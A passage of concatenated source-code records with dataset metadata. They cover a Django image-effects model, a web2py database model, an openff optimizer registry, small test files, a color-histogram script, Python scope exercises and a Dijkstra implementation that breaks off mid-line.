Meta:\n ordering = ['id']\n\nclass ImageStyle(models.Model):\n name = models.CharField(max_length=511)\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n image = models.ImageField(upload_to=get_upload_file_name,null=True,blank=True)\n def __str__(self):\n return \"%s - %s\" % (self.style.name,self.name)\n\n def apply_effects(self,effects):\n orig = Image.open(os.path.join(settings.MEDIA_ROOT,self.name))\n if orig.mode != 'RGBA':\n orig = orig.convert('RGBA')\n\n # Fix orientation\n orientation = False\n try:\n exif=dict((ExifTags.TAGS[k], v) for k, v in orig._getexif().items() if k in ExifTags.TAGS)\n if exif.get('Orientation') == 8:\n orig=orig.rotate(90, expand=True)\n orientation = True\n if exif.get('Orientation') == 6:\n orig=orig.rotate(270, expand=True)\n orientation = True\n except AttributeError:\n pass # No EXIF\n\n # Handle transparency\n if orientation:\n size = orig.size\n else:\n size = orig.size\n im = Image.new('RGBA', orig.size, (0,0,0,0))\n im.paste(orig)\n\n for effect in effects:\n if type(effect['object']) is Crop:\n w, h = im.size\n if effect['object'].anchor == 1:\n box = (0,0,effect['object'].width,effect['object'].height)\n elif effect['object'].anchor == 2:\n box = ((w/2)-(effect['object'].width/2),0,(effect['object'].width/2)+(w/2),effect['object'].height)\n elif effect['object'].anchor == 3:\n box = (w-effect['object'].width,0,w,effect['object'].height)\n elif effect['object'].anchor == 4:\n box = (0,(h/2)-(effect['object'].height/2),effect['object'].width,(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 5:\n box = ((w/2)-(effect['object'].width/2),(h/2)-(effect['object'].height/2),(effect['object'].width/2)+(w/2),(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 6:\n box = (w-effect['object'].width,(h/2)-(effect['object'].height/2),w,(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 7:\n box = (0,h-effect['object'].height,effect['object'].width,h)\n elif effect['object'].anchor == 8:\n box = ((w/2)-(effect['object'].width/2),h-effect['object'].height,(effect['object'].width/2)+(w/2),h)\n elif effect['object'].anchor == 9:\n box = (w-effect['object'].width,h-effect['object'].height,w,h)\n im = im.crop(box)\n elif type(effect['object']) is Enhance:\n \n if effect['object'].color > 100:\n color = 2\n elif effect['object'].color < -100:\n color = 0\n else:\n color = float(effect['object'].color+100)/100\n converter = ImageEnhance.Color(im)\n im = converter.enhance(color)\n \n if effect['object'].contrast > 100:\n contrast = 2\n elif effect['object'].contrast < -100:\n contrast = 0\n else:\n contrast = float(effect['object'].contrast+100)/100\n converter = ImageEnhance.Contrast(im)\n im = converter.enhance(contrast)\n \n if effect['object'].brightness > 100:\n brightness = 2\n elif effect['object'].brightness < -100:\n brightness = 0\n else:\n brightness = float(effect['object'].brightness+100)/100\n converter = ImageEnhance.Brightness(im)\n im = converter.enhance(brightness)\n \n if effect['object'].sharpness > 100:\n sharpness = 2\n elif effect['object'].sharpness < -100:\n sharpness = 0\n else:\n sharpness = float(effect['object'].sharpness+100)/100\n \n converter = ImageEnhance.Sharpness(im)\n im = converter.enhance(sharpness)\n \n\n elif type(effect['object']) is Resize:\n im = im.resize((effect['object'].width,effect['object'].height))\n elif type(effect['object']) is Rotate:\n im = im.rotate(-effect['object'].angle)\n elif type(effect['object']) is Scale:\n w, h = im.size\n if effect['object'].height is None:\n width = effect['object'].width\n height = int(float(h)/w*width)\n elif effect['object'].width is None:\n height = effect['object'].height\n width = int(float(w)/h*height)\n else:\n height = effect['object'].height\n width = effect['object'].width\n\n if effect['object'].allow_upscale:\n im = im.resize((width,height),effect['object'].mode)\n else:\n if w > width and h > height:\n im = im.resize((width,height),effect['object'].mode)\n elif type(effect['object']) is SmartScale:\n w, h = im.size\n im_prop = float(h)/float(w)\n\n if im_prop > 1.0:\n width = effect['object'].width\n height = int(float(h)/w*width)\n else:\n height = effect['object'].height\n width = int(float(w)/h*height)\n\n if effect['object'].allow_upscale:\n im = im.resize((width,height),effect['object'].mode)\n else:\n if w > width and h > height:\n im = im.resize((width,height),effect['object'].mode)\n elif type(effect['object']) is RoundCorners:\n circle = Image.new('L', (effect['object'].radius * 2, effect['object'].radius * 2), 0)\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, effect['object'].radius * 2, effect['object'].radius * 2), fill=255)\n alpha = Image.new('L', im.size, \"white\")\n w, h = im.size\n alpha.paste(circle.crop((0, 0, effect['object'].radius, effect['object'].radius)), (0, 0))\n alpha.paste(circle.crop((0, effect['object'].radius, effect['object'].radius, effect['object'].radius * 2)), (0, h - effect['object'].radius))\n alpha.paste(circle.crop((effect['object'].radius, 0, effect['object'].radius * 2, effect['object'].radius)), (w - effect['object'].radius, 0))\n alpha.paste(circle.crop((effect['object'].radius, effect['object'].radius, effect['object'].radius * 2, effect['object'].radius * 2)), (w - effect['object'].radius, h - effect['object'].radius))\n im.putalpha(alpha)\n \n try:\n im.save(self.image.path)\n except IOError:\n # Not the most elegant way to handle RGBA jpgs, but works\n background = Image.new(\"RGB\", im.size, (255, 255, 255))\n background.paste(im, mask=im.split()[3])\n im = background\n im.save(self.image.path)\n\n \n def save(self,*args,**kwargs):\n if self.id is None:\n new_image = get_upload_file_name(self,self.name)\n if not os.path.exists(os.path.dirname(os.path.join(settings.MEDIA_ROOT,new_image))):\n os.makedirs(os.path.dirname(os.path.join(settings.MEDIA_ROOT,new_image)))\n self.image = new_image\n self.apply_effects(self.style.get_effects())\n return super(ImageStyle,self).save(*args,**kwargs)\n\nclass Crop(models.Model):\n ANCHORS = (\n (1,'top-left'),\n (2,'top-center'),\n (3,'top-right'),\n (4,'middle-left'),\n (5,'middle-center'),\n (6,'middle-right'),\n (7,'bottom-left'),\n (8,'bottom-center'),\n (9,'bottom-right'),\n )\n width = models.IntegerField()\n height = models.IntegerField()\n anchor = models.IntegerField(choices=ANCHORS,default=5)\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n \n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1] \n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Crop,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Crop,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n\nclass Enhance(models.Model):\n CONTRASTS = zip( range(-100,101), range(-100,101) )\n SHARPNESSES = zip( range(-100,101), range(-100,101) )\n BRIGHTNESSES = zip( range(-100,101), range(-100,101) )\n COLORS = zip( range(-100,101), range(-100,101) )\n contrast = models.IntegerField(choices=CONTRASTS,default=0)\n brightness = models.IntegerField(choices=BRIGHTNESSES,default=0)\n color = models.IntegerField(choices=COLORS,default=0)\n sharpness = models.IntegerField(choices=SHARPNESSES,default=0)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n \n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Enhance,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Enhance,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Resize(models.Model):\n width = models.IntegerField()\n height = models.IntegerField()\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Resize,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Resize,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass RoundCorners(models.Model):\n radius = models.IntegerField()\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(RoundCorners,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(RoundCorners,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Rotate(models.Model):\n ANGLES = zip( range(90,360,90), range(90,360,90) )\n angle = models.IntegerField(choices=ANGLES,default=0)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Rotate,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Rotate,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Scale(models.Model):\n MODES = (\n (Image.NEAREST,'Nearest'),\n (Image.ANTIALIAS,'Antialias'),\n (Image.BILINEAR,'Bilinear'),\n (Image.BICUBIC,'Bicubic'),\n )\n mode = models.PositiveSmallIntegerField(choices=MODES,default=1)\n width = models.IntegerField(blank=True,null=True)\n height = models.IntegerField(blank=True,null=True)\n allow_upscale = models.BooleanField(default=True)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Scale,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Scale,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n\n\nclass SmartScale(models.Model):\n MODES = (\n (Image.NEAREST,'Nearest'),\n (Image.ANTIALIAS,'Antialias'),\n (Image.BILINEAR,'Bilinear'),\n (Image.BICUBIC,'Bicubic'),\n )\n mode = models.PositiveSmallIntegerField(choices=MODES,default=1)\n width = models.IntegerField()\n height = models.IntegerField()\n allow_upscale = models.BooleanField(default=True)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(SmartScale,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(SmartScale,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n","sub_path":"image_styles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"214098881","text":"import json\nimport openpyxl\nimport yaml\n\nwb = openpyxl.load_workbook(\"RIT-DuPont.xlsx\")\n\nws = wb.worksheets[0]\ndv = [ws[f\"A{k}\"].value for k in range(3, 315)]\n\nwhite = [ws[\"B3\"].value, ws[\"C3\"].value, ws[\"D3\"].value]\n\npairs = [\n [\n [ws[f\"E{k}\"].value, ws[f\"F{k}\"].value, ws[f\"G{k}\"].value],\n [ws[f\"H{k}\"].value, ws[f\"I{k}\"].value, ws[f\"J{k}\"].value],\n ]\n for k in range(3, 315)\n]\n\nd = {\"reference_white\": white, \"dv\": dv, \"pairs\": pairs}\nwith open(\"rit-dupont.yaml\", \"w\") as f:\n yaml.dump(d, f)\n\nwith open(\"rit-dupont.json\", \"w\") as f:\n json.dump(d, f, indent=2)\n","sub_path":"rit-dupont/melgosa/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517857629","text":"from collections import namedtuple\nimport csv\nimport os\nimport unittest\nimport logging\n\nimport pbsmrtpipe.tools.gather as G\n\nfrom base import get_temp_file, get_temp_dir\n\nlog = logging.getLogger(__name__)\n\n\nclass Record(object):\n def __init__(self, idx, alpha):\n self.idx = idx\n self.alpha = alpha\n\n def to_dict(self):\n return dict(id=self.idx, alpha=self.alpha)\n\n\ndef _to_n_records(nrecords):\n for i in xrange(nrecords):\n r = Record(i, 90)\n yield r\n\n\ndef _write_records_to_csv(records, output_csv):\n fields = records[0].to_dict().keys()\n with open(output_csv, 'w') as w:\n writer = csv.DictWriter(w, fieldnames=fields)\n writer.writeheader()\n writer.writerows([r.to_dict() for r in records])\n\n\nclass TestCsvGather(unittest.TestCase):\n\n def test_smoke(self):\n t = get_temp_file(suffix=\"-records-1.csv\")\n _write_records_to_csv(list(_to_n_records(100)), t)\n\n t2 = get_temp_file(suffix=\"-records-2.csv\")\n _write_records_to_csv(list(_to_n_records(57)), t2)\n\n tg = get_temp_file(suffix=\"records-gather.csv\")\n G.gather_csv([t, t2], tg)\n\n nrecords = 0\n with open(tg, 'r') as r:\n reader = csv.DictReader(r)\n log.debug(reader.fieldnames)\n for _ in reader:\n nrecords += 1\n\n self.assertEqual(nrecords, 157)","sub_path":"pbsmrtpipe/tests/test_tools_gather.py","file_name":"test_tools_gather.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"306318752","text":"from unittest import TestCase\n\nfrom neocore.bin import cli\n\n\nclass CliTestCase(TestCase):\n def test_address_to_scripthash(self):\n address = \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\"\n scripthash = cli.address_to_scripthash(address)\n self.assertEqual(scripthash, b'#\\xba\\'\\x03\\xc52c\\xe8\\xd6\\xe5\"\\xdc2 39\\xdc\\xd8\\xee\\xe9')\n\n address = \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRpxx\"\n with self.assertRaises(cli.ConversionError):\n scripthash = cli.address_to_scripthash(address)\n\n def test_scripthash_to_address(self):\n scripthash = \"0xe9eed8dc39332032dc22e5d6e86332c50327ba23\"\n address = cli.scripthash_to_address(scripthash)\n self.assertEqual(address, \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\")\n\n scripthash = \"e9eed8dc39332032dc22e5d6e86332c50327ba23\"\n address = cli.scripthash_to_address(scripthash)\n self.assertEqual(address, \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\")\n\n scripthash = \"0xe9eed8dc39332032dc22e5d6e86332c50327baxx\"\n with self.assertRaises(cli.ConversionError):\n address = cli.scripthash_to_address(scripthash)\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"602986890","text":"\"\"\"\nHere we register all optimizers with bespokefit.\n\"\"\"\nfrom typing import Dict, List, Union\n\nfrom openff.bespokefit.exceptions import OptimizerError\nfrom openff.bespokefit.optimizers.forcebalance import ForceBalanceOptimizer\nfrom openff.bespokefit.optimizers.model import Optimizer\n\noptimizers: Dict[str, Optimizer] = {}\n\n\ndef register_optimizer(optimizer: Optimizer, replace: bool = False) -> None:\n \"\"\"\n Register a new valid optimizer with bespokefit.\n\n Parameters\n ----------\n optimizer: Optimizer\n The optimizer class that should be registered.\n replace: bool\n If the optimizer should replace another optimizer registered with the same name.\n\n Raises\n ------\n OptimizerError\n If the optimizer is already registered or if the optimizer object is not compatible.\n \"\"\"\n\n if issubclass(type(optimizer), Optimizer):\n optimizer_name = optimizer.optimizer_name.lower()\n if optimizer_name not in optimizers or (\n optimizer_name in optimizers and replace\n ):\n optimizers[optimizer_name] = optimizer\n else:\n raise OptimizerError(\n f\"An optimizer is already registered under the name {optimizer.optimizer_name}, to replace this please use the `replace=True` flag.\"\n )\n else:\n raise OptimizerError(\n f\"The optimizer {optimizer} could not be registered it must be a subclass of openff.bespokefit.optimzers.Optimizer\"\n )\n\n\ndef deregister_optimizer(optimizer: Union[Optimizer, str]) -> None:\n \"\"\"\n Remove an optimizer from the list of valid optimizers.\n\n Parameters\n ----------\n optimizer: Union[Optimizer, str]\n The optimizer class or name of the class that should be removed.\n \"\"\"\n\n try:\n optimizer_name = optimizer.optimizer_name.lower()\n except AttributeError:\n optimizer_name = optimizer.lower()\n\n opt = optimizers.pop(optimizer_name, None)\n if opt is None:\n raise OptimizerError(\n f\"The optimizer {optimizer} was not registered with bespokefit.\"\n )\n\n\ndef get_optimizer(optimizer_name: str, **kwargs) -> Optimizer:\n \"\"\"\n Get the optimizer class from the list of registered optimizers in bespokefit by name.\n\n Parameters\n ----------\n optimizer_name: str\n The `optimizer_name` attribute of the optimizer that should be fetched.\n kwargs: dict\n Any kwargs that should be passed into the optimizer.\n\n Returns\n -------\n Optimizer\n The requested optimizer matching the given optimizer name.\n \"\"\"\n\n opt = optimizers.get(optimizer_name.lower(), None)\n if opt is None:\n raise OptimizerError(\n f\"The optimizer {optimizer_name} was not registered with bespokefit.\"\n )\n\n if kwargs:\n return opt.parse_obj(kwargs)\n else:\n return opt\n\n\ndef list_optimizers() -> List[str]:\n \"\"\"\n Get the list of registered optimizers with bespokefit.\n\n Returns\n -------\n List[str]\n A list of the optimizer classes registered.\n \"\"\"\n\n return list(optimizers.keys())\n\n\n# register the built in optimizers\nregister_optimizer(ForceBalanceOptimizer())\n","sub_path":"openff/bespokefit/optimizers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"361292068","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt \n\ndef RGB(img):\n b, g, r = cv2.split(img)\n x = b.sum()\n y = g.sum()\n z = r.sum()\n total = x+y+z\n rate = [float(x)/total, float(y)/total, float(z)/total]\n return rate\n\ndef draw(data, name):\n global count\n plt.figure(count)\n colors = ['b', 'g', 'r']\n bgr = [1, 2, 3] \n a=plt.bar(bgr, data, 0.5, color=colors, linewidth=0, align='center')\n plt.xticks(bgr, colors)\n plt.title(name)\n for i in a:\n #print i\n xloc = i.get_x()\n yloc = i.get_height()\n #print xloc, yloc\n plt.text(xloc+0.15,yloc*1.01,(\"%.3f\"%yloc))\n count += 1\n\nN = 2\ncount = 0\nfor i in range(N):\n plt.figure(i)\nimg1 = cv2.imread(\"img1.png\",cv2.IMREAD_COLOR)\ndata1 = RGB(img1)\ndraw(data1,\"color histogram for img1\")\nimg2 = cv2.imread(\"img2.png\",cv2.IMREAD_COLOR)\ndata2 = RGB(img2)\ndraw(data2,\"color histogram for img2\")\nplt.show()\n\n","sub_path":"Exp7/Exp7/images/颜色直方图.py","file_name":"颜色直方图.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430637110","text":"# -*- coding: utf-8 -*-\n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n## File is released under public domain and you can use without limitations\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\nimport uuid\nimport datetime\ndb = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db)\nauth.settings.allow_basic_login = True\nauth.settings.extra_fields['auth_user']=[Field(\"uuid\", \"string\", length = 64, readable=False, writable=False, default=lambda: uuid.uuid4() )]\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\nauth.settings.actions_disabled.append('register')\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = 'logging' or 'smtp.gmail.com:587'\nmail.settings.sender = 'admin@localhost'\nmail.settings.login = 'username:password'\n\n## configure auth policy\n\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = True\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\n## after defining tables, uncomment below to enable auditing\n# auth.enable_record_versioning(db)\n\ndb.define_table('groups',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field(\"user_uuid\", 'string', requires=IS_IN_DB(db, db.auth_user.uuid)),\n Field('name', 'string', requires=IS_NOT_EMPTY())\n )\n\n\ndb.define_table('albums',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field(\"user_uuid\", 'string', requires=IS_IN_DB(db, db.auth_user.uuid), writable=False),\n Field('name', 'string', unique=True, requires=IS_NOT_EMPTY()),\n Field('groups', 'string'))\n\n\n\n\ndb.define_table('images',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, readable=False, default=datetime.datetime.utcnow()),\n Field('album_uuid', 'string', length=64, requires=IS_IN_DB(db, db.albums.uuid, '%(name)s', zero=None, orderby=db.albums.name), label=T('Album')),\n Field('filename', 'upload', requires=IS_IMAGE(extensions=('jpeg', 'png','jpg'))),\n Field('title', 'string', length=72),\n Field('body', 'text', length=1024)\n )\n \n\ndb.define_table('comments',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field('image_uuid', 'string', length=64, readable=False, writable=False, requires=IS_IN_DB(db, db.images.uuid))\n )\n\ndb.define_table('api_keys',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field('user_uuid', 'string', length=64, readable=False, writable=False, requires=IS_IN_DB(db, db.auth_user.uuid)),\n Field('api_key','string', length = 32)\n )\n\n\n\ndef upload_validate(form):\n filename=form.vars.filename.filename.lower()\n form.vars.filename.filename=filename\n","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"27637743","text":"#FUNCTIONS\n\ndef add(x,y):\n return x + y \n\nprint(add(5,10))\n\nanswer = add(100,20)\nprint(answer)\n\ndef rev(text):\n return text[::-1]\n\nprint(rev(\"pen\"))\n\n\n#SCOPE\n\n#global scope\na = 250\n\ndef f1 ():\n #a = 100 #local\n #b = a + 10 #uses global a when above line is commented out\n #print(b)\n global a\n a = 100 # changes global value which overwrites the a = 250\n print(a)\n\n\ndef f2 ():\n a = 50 #local\n print(a)\n\nf1()\nf2() \nprint(a) #global a \n\n\na = [1, 2, 3]\n\ndef f1():\n a[0] = 5 #changes global value to first item in list a\n print(a)\n\ndef f2():\n a = 50\n print(a)\n\nf1()\nf2()\nprint(a)\n\n\n# def about(name, age, likes):\n# sentence = \"Meet {}! They are {} years old, and they like {}.\".format(name, age, likes)\n# return sentence\n\n# print(about(\"Jack\", 23, \"Python\"))\n\n# print(about(age = 35, name = \"John\", likes = \"Java\"))\n\n\ndef about(name = \"Eric\", age = 33, likes = \"Python\"):#creates defauly parameter and they must go at the end\n sentence = \"Meet {}! They are {} years old, and they like {}.\".format(name, age, likes)\n return sentence\n\nprint(about(\"Jack\", 23))\nprint(about())\nprint(about(\"Tim\"))\nprint(about(likes = \"Surfing\"))\n","sub_path":"Python_Bible_Functions_and_Scope.py","file_name":"Python_Bible_Functions_and_Scope.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"312288576","text":"import math\n\nINFINITY = math.inf\n\n\nclass Grafo:\n listaDeAdjacencias = {}\n vertices_abertos = []\n vertices_fechados = []\n rot = []\n dt = []\n\n def __init__(self, n, m, b):\n self.__n = n\n self.__m = m\n self.__b = b\n\n def get_n(self):\n return self.__n\n\n def get_m(self):\n return self.__m\n\n def get_b(self):\n return self.__b\n\n def fecha_o_vertice(self, vrt):\n self.vertices_abertos[vrt] = False\n\n # adiciona o vertice no conjunto dos fechados\n def adiciona_vertice_aos_fechados(self, vrt):\n self.vertices_fechados.append(vrt)\n\n def vertice_esta_aberto(self, c):\n return self.vertices_abertos[c]\n\n def adionar_aresta(self, aresta):\n origem = aresta.get_origem()\n destino = aresta.get_destino()\n peso = aresta.get_peso()\n adj_nova = [(destino, peso)]\n if origem in self.listaDeAdjacencias:\n # pega as adjacencias que já estão lá\n adj_existentes = self.listaDeAdjacencias.get(origem) # da origem\n self.listaDeAdjacencias.update({origem: (adj_existentes + adj_nova)})\n if self.get_b() == 0:\n # acrecentar a origem enquanto adjacencia do destino também\n adj_nova_reciproca = [(origem, peso)]\n if destino in self.listaDeAdjacencias:\n adj_existentes = self.listaDeAdjacencias.get(aresta.get_destino()) # do destino\n self.listaDeAdjacencias.update({destino: (adj_existentes + adj_nova_reciproca)})\n else:\n self.listaDeAdjacencias.update({destino: adj_nova_reciproca})\n else: # caso origem nao esteja no grafo ainda\n self.listaDeAdjacencias.update({origem: adj_nova})\n if self.get_b() == 0:\n adj_nova_reciproca = [(origem, peso)]\n if destino in self.listaDeAdjacencias:\n adj_existentes = self.listaDeAdjacencias.get(aresta.get_destino())\n self.listaDeAdjacencias.update({destino: (adj_existentes + adj_nova_reciproca)})\n else: # se destino não estiver lá, é só acrescentar normal\n self.listaDeAdjacencias.update({destino: adj_nova_reciproca})\n\n def dijkstra(self, vertice_inicial):\n # Inicialização\n self.vertices_abertos.append(None) # invalida vertices_abertos[0]\n self.dt.append(INFINITY) # invalida(dt[0]).\n self.rot.append(-1) # invalida (rot[0])\n for v in range(0, n):\n self.vertices_abertos.append(True)\n self.dt.append(INFINITY)\n self.rot.append(0)\n self.dt[vertice_inicial.get_indice()] = 0\n # Início do algortimo\n while len(self.vertices_fechados) != self.__n:\n vertice_com_menor_dt = self.encontra_vertice_com_menor_dt_entre_os_abertos()\n self.fecha_o_vertice(vertice_com_menor_dt)\n self.adiciona_vertice_aos_fechados(vertice_com_menor_dt)\n # self.vertices_abertos.pop(v) # tira o vértice v dos abertos.\n vizinhos_abertos_do_vertice = self.obter_vizinhos_abertos_de(vertice_com_menor_dt)\n if vizinhos_abertos_do_vertice is not None:\n for vizinho, peso in vizinhos_abertos_do_vertice:\n if self.dt[vertice_com_menor_dt] + peso < self.dt[vizinho.get_indice()]:\n self.dt[vizinho.get_indice()] = self.dt[vertice_com_menor_dt] + peso\n self.rot[vizinho.get_indice()] = vertice_com_menor_dt\n\n # olha as distancias calculadas de todos os vertices que estão abertos\n def encontra_vertice_com_menor_dt_entre_os_abertos(self):\n dt_dos_abertos = []\n for v in range(0, self.__n + 1): # pega o dt de todos os vertices que estao abertos\n if self.vertices_abertos[v]:\n dt_dos_abertos.append(self.dt[v]) # e armazena o dt deles em dt_dos_abertos\n return self.dt.index(min(dt_dos_abertos)) # pega o indice do vertice com menor dt\n\n def obter_vizinhos_abertos_de(self, v):\n vizinhos_abertos_de_v = []\n adjacencias_do_vertice = self.obter_adjacencias(Vertice(v))\n # print(f'Adjacencias de {v}: {adjacencias_do_vertice}')\n if adjacencias_do_vertice is None:\n return None\n for v, p in adjacencias_do_vertice:\n if self.vertice_esta_aberto(v.get_indice()):\n vizinhos_abertos_de_v.append((v, p))\n return vizinhos_abertos_de_v\n\n def obter_adjacencias(self, vertice):\n return self.listaDeAdjacencias.get(vertice)\n\n def resposta_dijkstra_formatada(self):\n vertice = 1\n while vertice <= self.__n:\n if self.rot[vertice] == 0: # origem\n vertice += 1\n continue\n vertice_de_destino = vertice\n # compondo a estrutura do menor caminho\n menor_caminho = [vertice_de_destino]\n while vertice_de_destino != 0: # percorrendo o vetor rot até chegar na origem (de trás para frente)\n vertice_de_destino = self.rot[vertice_de_destino] # atualiza o vertice de destino com o rot dele\n if vertice_de_destino == 0: # não insere pois 0 é uma abstração para a origem\n break\n menor_caminho.append(vertice_de_destino) # acrescenta o rot dele na estrutura do caminho\n menor_caminho.reverse()\n print(f'{vertice} ({self.dt[vertice]}):', end=' 